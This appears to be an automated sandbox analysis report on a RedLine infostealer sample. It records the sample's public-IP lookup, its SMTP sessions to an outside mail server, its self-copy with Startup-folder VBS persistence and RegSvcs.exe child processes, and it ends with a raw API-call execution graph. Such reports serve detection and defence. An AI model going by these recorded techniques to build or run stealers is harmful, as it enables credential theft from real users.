                          2024-10-08 12:44:38 UTC | 155 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                          Host: api.ipify.org
                          Connection: Keep-Alive
                          2024-10-08 12:44:39 UTC | 211 | IN | HTTP/1.1 200 OK
                          Date: Tue, 08 Oct 2024 12:44:38 GMT
                          Content-Type: text/plain
                          Content-Length: 11
                          Connection: close
                          Vary: Origin
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 8cf639379cd1180d-EWR
                          2024-10-08 12:44:39 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                          Data Ascii: 8.46.123.33


                          Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                          Oct 8, 2024 14:44:20.936208010 CEST | 587 | 49731 | 198.54.122.135 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
                          Oct 8, 2024 14:44:20.936414003 CEST | 49731 | 587 | 192.168.2.4 | 198.54.122.135 | EHLO 116938
                          Oct 8, 2024 14:44:21.097505093 CEST | 587 | 49731 | 198.54.122.135 | 192.168.2.4 | 250-mta-10.privateemail.com
                          250-PIPELINING
                          250-SIZE 81788928
                          250-ETRN
                          250-AUTH PLAIN LOGIN
                          250-ENHANCEDSTATUSCODES
                          250-8BITMIME
                          250-CHUNKING
                          250 STARTTLS
                          Oct 8, 2024 14:44:21.097913027 CEST | 49731 | 587 | 192.168.2.4 | 198.54.122.135 | STARTTLS
                          Oct 8, 2024 14:44:21.258491993 CEST | 587 | 49731 | 198.54.122.135 | 192.168.2.4 | 220 Ready to start TLS
                          Oct 8, 2024 14:44:40.797152996 CEST | 587 | 49739 | 198.54.122.135 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
                          Oct 8, 2024 14:44:40.797447920 CEST | 49739 | 587 | 192.168.2.4 | 198.54.122.135 | EHLO 116938
                          Oct 8, 2024 14:44:40.966017008 CEST | 587 | 49739 | 198.54.122.135 | 192.168.2.4 | 250-mta-10.privateemail.com
                          250-PIPELINING
                          250-SIZE 81788928
                          250-ETRN
                          250-AUTH PLAIN LOGIN
                          250-ENHANCEDSTATUSCODES
                          250-8BITMIME
                          250-CHUNKING
                          250 STARTTLS
                          Oct 8, 2024 14:44:40.970283031 CEST | 49739 | 587 | 192.168.2.4 | 198.54.122.135 | STARTTLS
                          Oct 8, 2024 14:44:41.134866953 CEST | 587 | 49739 | 198.54.122.135 | 192.168.2.4 | 220 Ready to start TLS


                          Target ID:0
                          Start time:08:44:07
                          Start date:08/10/2024
                          Path:C:\Users\user\Desktop\q6utlq83i0.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\q6utlq83i0.exe"
                          Imagebase:0x400000
                          File size:1'301'411 bytes
                          MD5 hash:2B2832A4E1BF4E26E59980F4162334E2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:08:44:13
                          Start date:08/10/2024
                          Path:C:\Users\user\AppData\Local\inhumate\incalculability.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\q6utlq83i0.exe"
                          Imagebase:0x400000
                          File size:1'301'411 bytes
                          MD5 hash:2B2832A4E1BF4E26E59980F4162334E2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 63%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:08:44:16
                          Start date:08/10/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\q6utlq83i0.exe"
                          Imagebase:0xd00000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:08:44:25
                          Start date:08/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs"
                          Imagebase:0x7ff77cf30000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:08:44:26
                          Start date:08/10/2024
                          Path:C:\Users\user\AppData\Local\inhumate\incalculability.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\inhumate\incalculability.exe"
                          Imagebase:0x400000
                          File size:1'301'411 bytes
                          MD5 hash:2B2832A4E1BF4E26E59980F4162334E2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1899832832.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          Target ID:6
                          Start time:08:44:31
                          Start date:08/10/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\AppData\Local\inhumate\incalculability.exe"
                          Imagebase:0x60000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:08:44:32
                          Start date:08/10/2024
                          Path:C:\Users\user\AppData\Local\inhumate\incalculability.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\inhumate\incalculability.exe"
                          Imagebase:0x400000
                          File size:1'301'411 bytes
                          MD5 hash:2B2832A4E1BF4E26E59980F4162334E2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:10
                          Start time:08:44:36
                          Start date:08/10/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\inhumate\incalculability.exe"
                          Imagebase:0xa60000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false


                            Execution Graph

                            Execution Coverage:3.6%
                            Dynamic/Decrypted Code Coverage:0.4%
                            Signature Coverage:8.8%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:35
84711->84712 84712->84711 84713 416b43 84712->84713 84714 416b24 Sleep 84712->84714 84713->84636 84715 416b39 84714->84715 84715->84712 84715->84713 84716->84649 84718 413753 RtlFreeHeap 84717->84718 84722 41377c _free 84717->84722 84719 413768 84718->84719 84718->84722 84726 417f77 46 API calls __getptd_noexit 84719->84726 84721 41376e GetLastError 84721->84722 84722->84647 84727 417daa 84723->84727 84726->84721 84728 417dc9 setSBUpLow __call_reportfault 84727->84728 84729 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84728->84729 84732 417eb5 __call_reportfault 84729->84732 84731 417ed1 GetCurrentProcess TerminateProcess 84731->84655 84733 41a208 84732->84733 84734 41a210 84733->84734 84735 41a212 IsDebuggerPresent 84733->84735 84734->84731 84741 41fe19 84735->84741 84738 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84739 421ff0 __call_reportfault 84738->84739 84740 421ff8 GetCurrentProcess TerminateProcess 84738->84740 84739->84740 84740->84731 84741->84738 84742->84659 84744 408f48 ctype 84743->84744 84745 4265c7 VariantClear 84744->84745 84746 408f55 ctype 84744->84746 84745->84746 84746->84664 84803 40ebd0 84747->84803 84807 4182cb 84750->84807 84752 41195e 84814 4181f2 LeaveCriticalSection 84752->84814 84754 40d748 84755 4119b0 84754->84755 84756 4119d6 84755->84756 84757 4119bc 84755->84757 84756->84672 84757->84756 84849 417f77 46 API calls __getptd_noexit 84757->84849 84759 4119c6 84850 417f25 10 API calls __mbschr_l 84759->84850 84761 4119d1 84761->84672 84762->84674 84851 401f20 84763->84851 84765 40d5b6 IsDebuggerPresent 84766 40d5c4 84765->84766 84767 42e1bb MessageBoxA 84765->84767 84768 42e1d4 84766->84768 84769 40d5e3 84766->84769 84767->84768 85023 403a50 52 API calls 3 library calls 84768->85023 84921 40f520 84769->84921 84773 40d5fd GetFullPathNameW 84933 401460 84773->84933 84775 40d63b 84776 40d643 84775->84776 84777 42e231 SetCurrentDirectoryW 84775->84777 84778 40d64c 84776->84778 85024 432fee 6 
API calls 84776->85024 84777->84776 84948 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84778->84948 84781 42e252 84781->84778 84783 42e25a GetModuleFileNameW 84781->84783 84785 42e274 84783->84785 84786 42e2cb GetForegroundWindow ShellExecuteW 84783->84786 85025 401b10 84785->85025 84792 40d688 84786->84792 84787 40d656 84788 40d669 84787->84788 84790 40e0c0 74 API calls 84787->84790 84956 4091e0 84788->84956 84790->84788 84795 40d692 SetCurrentDirectoryW 84792->84795 84795->84676 84797 42e28d 85032 40d200 52 API calls 2 library calls 84797->85032 84800 42e299 GetForegroundWindow ShellExecuteW 84801 42e2c6 84800->84801 84801->84792 84802 40ec00 LoadLibraryA GetProcAddress 84802->84667 84804 40d72e 84803->84804 84805 40ebd6 LoadLibraryA 84803->84805 84804->84667 84804->84802 84805->84804 84806 40ebe7 GetProcAddress 84805->84806 84806->84804 84808 4182e0 84807->84808 84809 4182f3 EnterCriticalSection 84807->84809 84815 418209 84808->84815 84809->84752 84811 4182e6 84811->84809 84842 411924 46 API calls 3 library calls 84811->84842 84814->84754 84816 418215 __wsopen_helper 84815->84816 84817 418225 84816->84817 84818 41823d 84816->84818 84843 418901 46 API calls __NMSG_WRITE 84817->84843 84820 416b04 __malloc_crt 45 API calls 84818->84820 84826 41824b __wsopen_helper 84818->84826 84822 418256 84820->84822 84821 41822a 84844 418752 46 API calls 5 library calls 84821->84844 84824 41825d 84822->84824 84825 41826c 84822->84825 84846 417f77 46 API calls __getptd_noexit 84824->84846 84829 4182cb __lock 45 API calls 84825->84829 84826->84811 84827 418231 84845 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84827->84845 84831 418273 84829->84831 84833 4182a6 84831->84833 84834 41827b InitializeCriticalSectionAndSpinCount 84831->84834 84835 413748 _free 45 API calls 84833->84835 84836 41828b 84834->84836 84841 418297 84834->84841 84835->84841 84837 413748 _free 45 API calls 84836->84837 84839 418291 84837->84839 84847 417f77 46 API 
calls __getptd_noexit 84839->84847 84848 4182c2 LeaveCriticalSection _doexit 84841->84848 84843->84821 84844->84827 84846->84826 84847->84841 84848->84826 84849->84759 84850->84761 85033 40e6e0 84851->85033 84855 401f41 GetModuleFileNameW 85051 410100 84855->85051 84857 401f5c 85063 410960 84857->85063 84860 401b10 52 API calls 84861 401f81 84860->84861 85066 401980 84861->85066 84863 401f8e 84864 408f40 VariantClear 84863->84864 84865 401f9d 84864->84865 84866 401b10 52 API calls 84865->84866 84867 401fb4 84866->84867 84868 401980 53 API calls 84867->84868 84869 401fc3 84868->84869 84870 401b10 52 API calls 84869->84870 84871 401fd2 84870->84871 85074 40c2c0 84871->85074 84873 401fe1 84874 40bc70 52 API calls 84873->84874 84875 401ff3 84874->84875 85092 401a10 84875->85092 84877 401ffe 85099 4114ab 84877->85099 84880 428b05 84882 401a10 52 API calls 84880->84882 84881 402017 84883 4114ab __wcsicoll 58 API calls 84881->84883 84884 428b18 84882->84884 84885 402022 84883->84885 84887 401a10 52 API calls 84884->84887 84885->84884 84886 40202d 84885->84886 84888 4114ab __wcsicoll 58 API calls 84886->84888 84889 428b33 84887->84889 84890 402038 84888->84890 84892 428b3b GetModuleFileNameW 84889->84892 84891 402043 84890->84891 84890->84892 84893 4114ab __wcsicoll 58 API calls 84891->84893 84894 401a10 52 API calls 84892->84894 84896 40204e 84893->84896 84895 428b6c 84894->84895 84898 40e0a0 52 API calls 84895->84898 84897 402092 84896->84897 84901 401a10 52 API calls 84896->84901 84906 428b90 _wcscpy 84896->84906 84900 4020a3 84897->84900 84897->84906 84899 428b7a 84898->84899 84902 401a10 52 API calls 84899->84902 84903 428bc6 84900->84903 85107 40e830 53 API calls 84900->85107 84904 402073 _wcscpy 84901->84904 84905 428b88 84902->84905 84912 401a10 52 API calls 84904->84912 84905->84906 84908 401a10 52 API calls 84906->84908 84910 4020d0 84908->84910 84909 4020bb 85108 40cf00 53 API calls 84909->85108 84915 402110 84910->84915 84919 401a10 52 API calls 84910->84919 
85109 40cf00 53 API calls 84910->85109 85110 40e6a0 53 API calls 84910->85110 84912->84897 84913 4020c6 84914 408f40 VariantClear 84913->84914 84914->84910 84918 408f40 VariantClear 84915->84918 84920 402120 ctype 84918->84920 84919->84910 84920->84765 84922 4295c9 setSBUpLow 84921->84922 84923 40f53c 84921->84923 84925 4295d9 GetOpenFileNameW 84922->84925 85786 410120 84923->85786 84925->84923 84927 40d5f5 84925->84927 84926 40f545 85790 4102b0 SHGetMalloc 84926->85790 84927->84773 84927->84775 84929 40f54c 85795 410190 GetFullPathNameW 84929->85795 84931 40f559 85806 40f570 84931->85806 85862 402400 84933->85862 84935 40146f 84938 428c29 _wcscat 84935->84938 85871 401500 84935->85871 84937 40147c 84937->84938 85879 40d440 84937->85879 84940 401489 84940->84938 84941 401491 GetFullPathNameW 84940->84941 84942 402160 52 API calls 84941->84942 84943 4014bb 84942->84943 84944 402160 52 API calls 84943->84944 84945 4014c8 84944->84945 84945->84938 84946 402160 52 API calls 84945->84946 84947 4014ee 84946->84947 84947->84775 84949 428361 84948->84949 84950 4103fc LoadImageW RegisterClassExW 84948->84950 85899 44395e EnumResourceNamesW LoadImageW 84949->85899 85898 410490 7 API calls 84950->85898 84953 40d651 84955 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84953->84955 84954 428368 84955->84787 84957 409202 84956->84957 84958 42d7ad 84956->84958 85016 409216 ctype 84957->85016 86171 410940 331 API calls 84957->86171 86174 45e737 90 API calls 3 library calls 84958->86174 84961 409386 84962 40939c 84961->84962 86172 40f190 10 API calls 84961->86172 84962->84792 85022 401000 Shell_NotifyIconW setSBUpLow 84962->85022 84964 4095b2 84964->84962 84966 4095bf 84964->84966 84965 409253 PeekMessageW 84965->85016 86173 401a50 331 API calls 84966->86173 84968 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84968->84962 84970 4095f9 84968->84970 84969 42d8cd Sleep 84969->85016 84974 42e158 TranslateMessage DispatchMessageW GetMessageW 84970->84974 84972 42e13b 
86192 40d410 VariantClear 84972->86192 84974->84974 84977 42e188 84974->84977 84976 409567 PeekMessageW 84976->85016 84977->84962 84980 44c29d 52 API calls 85011 4094e0 84980->85011 84981 46f3c1 107 API calls 84981->85016 84982 40e0a0 52 API calls 84982->85016 84983 46fdbf 108 API calls 84983->85011 84984 409551 TranslateMessage DispatchMessageW 84984->84976 84986 42dcd2 WaitForSingleObject 84988 42dcf0 GetExitCodeProcess CloseHandle 84986->84988 84986->85016 84987 42dd3d Sleep 84987->85011 86181 40d410 VariantClear 84988->86181 84992 4094cf Sleep 84992->85011 84994 40d410 VariantClear 84994->85016 84996 42d94d timeGetTime 86177 465124 53 API calls 84996->86177 84997 40c620 timeGetTime 84997->85011 85000 42dd89 CloseHandle 85000->85011 85001 47d33e 309 API calls 85001->85016 85003 465124 53 API calls 85003->85011 85004 42de19 GetExitCodeProcess CloseHandle 85004->85011 85006 401b10 52 API calls 85006->85011 85008 42de88 Sleep 85008->85016 85011->84980 85011->84983 85011->84997 85011->85000 85011->85003 85011->85004 85011->85006 85011->85008 85015 408f40 VariantClear 85011->85015 85011->85016 85020 401980 53 API calls 85011->85020 86178 45178a 54 API calls 85011->86178 86179 47d33e 331 API calls 85011->86179 86180 453bc6 54 API calls 85011->86180 86182 40d410 VariantClear 85011->86182 86183 443d19 67 API calls _wcslen 85011->86183 86184 4574b4 VariantClear 85011->86184 86185 403cd0 85011->86185 86189 4731e1 VariantClear 85011->86189 86190 4331a2 6 API calls 85011->86190 85014 45e737 90 API calls 85014->85016 85015->85011 85016->84961 85016->84965 85016->84969 85016->84972 85016->84976 85016->84981 85016->84982 85016->84984 85016->84986 85016->84987 85016->84992 85016->84994 85016->84996 85016->85001 85016->85011 85016->85014 85017 42e0cc VariantClear 85016->85017 85018 408f40 VariantClear 85016->85018 85900 4091b0 85016->85900 85958 40afa0 85016->85958 85984 408fc0 85016->85984 86019 408cc0 85016->86019 86033 40d150 85016->86033 86038 40d170 85016->86038 86044 
4096a0 85016->86044 86175 465124 53 API calls 85016->86175 86176 40c620 timeGetTime 85016->86176 86191 40e270 VariantClear ctype 85016->86191 85017->85016 85018->85016 85020->85011 85022->84792 85023->84775 85024->84781 85026 401b16 _wcslen 85025->85026 85027 4115d7 52 API calls 85026->85027 85030 401b63 85026->85030 85028 401b4b _memmove 85027->85028 85029 4115d7 52 API calls 85028->85029 85029->85030 85031 40d200 52 API calls 2 library calls 85030->85031 85031->84797 85032->84800 85034 40bc70 52 API calls 85033->85034 85035 401f31 85034->85035 85036 402560 85035->85036 85037 40256d __write_nolock 85036->85037 85038 402160 52 API calls 85037->85038 85040 402593 85038->85040 85050 4025bd 85040->85050 85111 401c90 85040->85111 85041 4026f0 52 API calls 85041->85050 85042 4026a7 85043 401b10 52 API calls 85042->85043 85049 4026db 85042->85049 85045 4026d1 85043->85045 85044 401b10 52 API calls 85044->85050 85115 40d7c0 52 API calls 2 library calls 85045->85115 85046 401c90 52 API calls 85046->85050 85049->84855 85050->85041 85050->85042 85050->85044 85050->85046 85114 40d7c0 52 API calls 2 library calls 85050->85114 85116 40f760 85051->85116 85054 410118 85054->84857 85056 42805d 85060 42806a 85056->85060 85172 431e58 85056->85172 85057 413748 _free 46 API calls 85059 428078 85057->85059 85061 431e58 82 API calls 85059->85061 85060->85057 85062 428084 85061->85062 85062->84857 85064 4115d7 52 API calls 85063->85064 85065 401f74 85064->85065 85065->84860 85067 4019a3 85066->85067 85069 401985 85066->85069 85068 4019b8 85067->85068 85067->85069 85775 403e10 53 API calls 85068->85775 85071 40199f 85069->85071 85774 403e10 53 API calls 85069->85774 85071->84863 85072 4019c4 85072->84863 85075 40c2c7 85074->85075 85076 40c30e 85074->85076 85079 40c2d3 85075->85079 85080 426c79 85075->85080 85077 40c315 85076->85077 85078 426c2b 85076->85078 85081 40c321 85077->85081 85082 426c5a 85077->85082 85084 426c4b 85078->85084 85085 426c2e 85078->85085 85776 403ea0 52 API calls 
__cinit 85079->85776 85781 4534e3 52 API calls 85080->85781 85777 403ea0 52 API calls __cinit 85081->85777 85780 4534e3 52 API calls 85082->85780 85779 4534e3 52 API calls 85084->85779 85091 40c2de 85085->85091 85778 4534e3 52 API calls 85085->85778 85091->84873 85091->85091 85093 401a30 85092->85093 85094 401a17 85092->85094 85096 402160 52 API calls 85093->85096 85095 401a2d 85094->85095 85782 403c30 52 API calls _memmove 85094->85782 85095->84877 85098 401a3d 85096->85098 85098->84877 85100 411523 85099->85100 85101 4114ba 85099->85101 85785 4113a8 58 API calls 3 library calls 85100->85785 85106 40200c 85101->85106 85783 417f77 46 API calls __getptd_noexit 85101->85783 85104 4114c6 85784 417f25 10 API calls __mbschr_l 85104->85784 85106->84880 85106->84881 85107->84909 85108->84913 85109->84910 85110->84910 85112 4026f0 52 API calls 85111->85112 85113 401c97 85112->85113 85113->85040 85114->85050 85115->85049 85176 40f6f0 85116->85176 85118 40f77b _strcat ctype 85184 40f850 85118->85184 85123 427c2a 85213 414d04 85123->85213 85125 40f7fc 85125->85123 85126 40f804 85125->85126 85200 414a46 85126->85200 85130 40f80e 85130->85054 85135 4528bd 85130->85135 85132 427c59 85219 414fe2 85132->85219 85134 427c79 85136 4150d1 _fseek 81 API calls 85135->85136 85137 452930 85136->85137 85716 452719 85137->85716 85140 452948 85140->85056 85141 414d04 __fread_nolock 61 API calls 85142 452966 85141->85142 85143 414d04 __fread_nolock 61 API calls 85142->85143 85144 452976 85143->85144 85145 414d04 __fread_nolock 61 API calls 85144->85145 85146 45298f 85145->85146 85147 414d04 __fread_nolock 61 API calls 85146->85147 85148 4529aa 85147->85148 85149 4150d1 _fseek 81 API calls 85148->85149 85150 4529c4 85149->85150 85151 4135bb _malloc 46 API calls 85150->85151 85152 4529cf 85151->85152 85153 4135bb _malloc 46 API calls 85152->85153 85154 4529db 85153->85154 85155 414d04 __fread_nolock 61 API calls 85154->85155 85156 4529ec 85155->85156 85157 44afef GetSystemTimeAsFileTime 
85156->85157 85158 452a00 85157->85158 85159 452a36 85158->85159 85160 452a13 85158->85160 85162 452aa5 85159->85162 85163 452a3c 85159->85163 85161 413748 _free 46 API calls 85160->85161 85166 452a1c 85161->85166 85165 413748 _free 46 API calls 85162->85165 85722 44b1a9 85163->85722 85168 452aa3 85165->85168 85169 413748 _free 46 API calls 85166->85169 85167 452a9d 85170 413748 _free 46 API calls 85167->85170 85168->85056 85171 452a25 85169->85171 85170->85168 85171->85056 85173 431e64 85172->85173 85174 431e6a 85172->85174 85175 414a46 __fcloseall 82 API calls 85173->85175 85174->85060 85175->85174 85177 425de2 85176->85177 85178 40f6fc _wcslen 85176->85178 85177->85118 85179 40f710 WideCharToMultiByte 85178->85179 85180 40f756 85179->85180 85181 40f728 85179->85181 85180->85118 85182 4115d7 52 API calls 85181->85182 85183 40f735 WideCharToMultiByte 85182->85183 85183->85118 85185 40f85d setSBUpLow _strlen 85184->85185 85187 40f7ab 85185->85187 85232 414db8 85185->85232 85188 4149c2 85187->85188 85244 414904 85188->85244 85190 40f7e9 85190->85123 85191 40f5c0 85190->85191 85196 40f5cd _strcat __write_nolock _memmove 85191->85196 85192 414d04 __fread_nolock 61 API calls 85192->85196 85194 425d11 85195 4150d1 _fseek 81 API calls 85194->85195 85197 425d33 85195->85197 85196->85192 85196->85194 85199 40f691 __tzset_nolock 85196->85199 85332 4150d1 85196->85332 85198 414d04 __fread_nolock 61 API calls 85197->85198 85198->85199 85199->85125 85201 414a52 __wsopen_helper 85200->85201 85202 414a64 85201->85202 85203 414a79 85201->85203 85472 417f77 46 API calls __getptd_noexit 85202->85472 85205 415471 __lock_file 47 API calls 85203->85205 85211 414a74 __wsopen_helper 85203->85211 85207 414a92 85205->85207 85206 414a69 85473 417f25 10 API calls __mbschr_l 85206->85473 85456 4149d9 85207->85456 85211->85130 85541 414c76 85213->85541 85215 414d1c 85216 44afef 85215->85216 85709 442c5a 85216->85709 85218 44b00d 85218->85132 85220 414fee __wsopen_helper 85219->85220 85221 
414ffa 85220->85221 85222 41500f 85220->85222 85713 417f77 46 API calls __getptd_noexit 85221->85713 85224 415471 __lock_file 47 API calls 85222->85224 85225 415017 85224->85225 85227 414e4e __ftell_nolock 51 API calls 85225->85227 85226 414fff 85714 417f25 10 API calls __mbschr_l 85226->85714 85229 415024 85227->85229 85715 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 85229->85715 85231 41500a __wsopen_helper 85231->85134 85233 414dd6 85232->85233 85234 414deb 85232->85234 85241 417f77 46 API calls __getptd_noexit 85233->85241 85234->85233 85236 414df2 85234->85236 85239 414de6 85236->85239 85243 418f98 77 API calls 6 library calls 85236->85243 85237 414ddb 85242 417f25 10 API calls __mbschr_l 85237->85242 85239->85185 85241->85237 85242->85239 85243->85239 85247 414910 __wsopen_helper 85244->85247 85245 414923 85300 417f77 46 API calls __getptd_noexit 85245->85300 85247->85245 85249 414951 85247->85249 85248 414928 85301 417f25 10 API calls __mbschr_l 85248->85301 85263 41d4d1 85249->85263 85252 414956 85253 41496a 85252->85253 85254 41495d 85252->85254 85256 414992 85253->85256 85257 414972 85253->85257 85302 417f77 46 API calls __getptd_noexit 85254->85302 85280 41d218 85256->85280 85303 417f77 46 API calls __getptd_noexit 85257->85303 85259 414933 __wsopen_helper @_EH4_CallFilterFunc@8 85259->85190 85264 41d4dd __wsopen_helper 85263->85264 85265 4182cb __lock 46 API calls 85264->85265 85266 41d4eb 85265->85266 85267 41d567 85266->85267 85276 418209 __mtinitlocknum 46 API calls 85266->85276 85278 41d560 85266->85278 85308 4154b2 47 API calls __lock 85266->85308 85309 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85266->85309 85269 416b04 __malloc_crt 46 API calls 85267->85269 85270 41d56e 85269->85270 85271 41d57c InitializeCriticalSectionAndSpinCount 85270->85271 85270->85278 85274 41d59c 85271->85274 85275 41d5af EnterCriticalSection 85271->85275 85273 41d5f0 __wsopen_helper 85273->85252 85277 413748 _free 46 API calls 85274->85277 
85275->85278 85276->85266 85277->85278 85305 41d5fb 85278->85305 85281 41d23a 85280->85281 85282 41d255 85281->85282 85291 41d26c __wopenfile 85281->85291 85314 417f77 46 API calls __getptd_noexit 85282->85314 85284 41d25a 85315 417f25 10 API calls __mbschr_l 85284->85315 85286 41d47a 85319 417f77 46 API calls __getptd_noexit 85286->85319 85287 41d48c 85311 422bf9 85287->85311 85290 41499d 85304 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 85290->85304 85291->85286 85299 41d421 85291->85299 85316 41341f 58 API calls 2 library calls 85291->85316 85292 41d47f 85320 417f25 10 API calls __mbschr_l 85292->85320 85295 41d41a 85295->85299 85317 41341f 58 API calls 2 library calls 85295->85317 85297 41d439 85297->85299 85318 41341f 58 API calls 2 library calls 85297->85318 85299->85286 85299->85287 85300->85248 85301->85259 85302->85259 85303->85259 85304->85259 85310 4181f2 LeaveCriticalSection 85305->85310 85307 41d602 85307->85273 85308->85266 85309->85266 85310->85307 85321 422b35 85311->85321 85313 422c14 85313->85290 85314->85284 85315->85290 85316->85295 85317->85297 85318->85299 85319->85292 85320->85290 85322 422b41 __wsopen_helper 85321->85322 85323 422b54 85322->85323 85326 422b8a 85322->85326 85324 417f77 __mbschr_l 46 API calls 85323->85324 85325 422b59 85324->85325 85328 417f25 __mbschr_l 10 API calls 85325->85328 85327 422400 __tsopen_nolock 109 API calls 85326->85327 85329 422ba4 85327->85329 85331 422b63 __wsopen_helper 85328->85331 85330 422bcb __wsopen_helper LeaveCriticalSection 85329->85330 85330->85331 85331->85313 85335 4150dd __wsopen_helper 85332->85335 85333 4150e9 85363 417f77 46 API calls __getptd_noexit 85333->85363 85335->85333 85336 41510f 85335->85336 85345 415471 85336->85345 85338 4150ee 85364 417f25 10 API calls __mbschr_l 85338->85364 85344 4150f9 __wsopen_helper 85344->85196 85346 415483 85345->85346 85347 4154a5 EnterCriticalSection 85345->85347 85346->85347 85348 41548b 85346->85348 85349 415117 85347->85349 85350 4182cb 
__lock 46 API calls 85348->85350 85351 415047 85349->85351 85350->85349 85352 415057 85351->85352 85354 415067 85351->85354 85421 417f77 46 API calls __getptd_noexit 85352->85421 85358 415079 85354->85358 85366 414e4e 85354->85366 85356 41505c 85365 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 85356->85365 85383 41443c 85358->85383 85361 4150b9 85396 41e1f4 85361->85396 85363->85338 85364->85344 85365->85344 85367 414e61 85366->85367 85368 414e79 85366->85368 85422 417f77 46 API calls __getptd_noexit 85367->85422 85369 414139 __flush 46 API calls 85368->85369 85371 414e80 85369->85371 85374 41e1f4 __write 51 API calls 85371->85374 85372 414e66 85423 417f25 10 API calls __mbschr_l 85372->85423 85375 414e97 85374->85375 85376 414f09 85375->85376 85378 414ec9 85375->85378 85382 414e71 85375->85382 85424 417f77 46 API calls __getptd_noexit 85376->85424 85379 41e1f4 __write 51 API calls 85378->85379 85378->85382 85380 414f64 85379->85380 85381 41e1f4 __write 51 API calls 85380->85381 85380->85382 85381->85382 85382->85358 85384 414477 85383->85384 85385 414455 85383->85385 85389 414139 85384->85389 85385->85384 85386 414139 __flush 46 API calls 85385->85386 85387 414470 85386->85387 85425 41b7b2 77 API calls 6 library calls 85387->85425 85390 414145 85389->85390 85391 41415a 85389->85391 85426 417f77 46 API calls __getptd_noexit 85390->85426 85391->85361 85393 41414a 85427 417f25 10 API calls __mbschr_l 85393->85427 85395 414155 85395->85361 85397 41e200 __wsopen_helper 85396->85397 85398 41e223 85397->85398 85399 41e208 85397->85399 85400 41e22f 85398->85400 85405 41e269 85398->85405 85448 417f8a 46 API calls __getptd_noexit 85399->85448 85450 417f8a 46 API calls __getptd_noexit 85400->85450 85403 41e20d 85449 417f77 46 API calls __getptd_noexit 85403->85449 85404 41e234 85451 417f77 46 API calls __getptd_noexit 85404->85451 85428 41ae56 85405->85428 85409 41e23c 85452 417f25 10 API calls __mbschr_l 85409->85452 85410 41e26f 85412 41e291 85410->85412 85413 
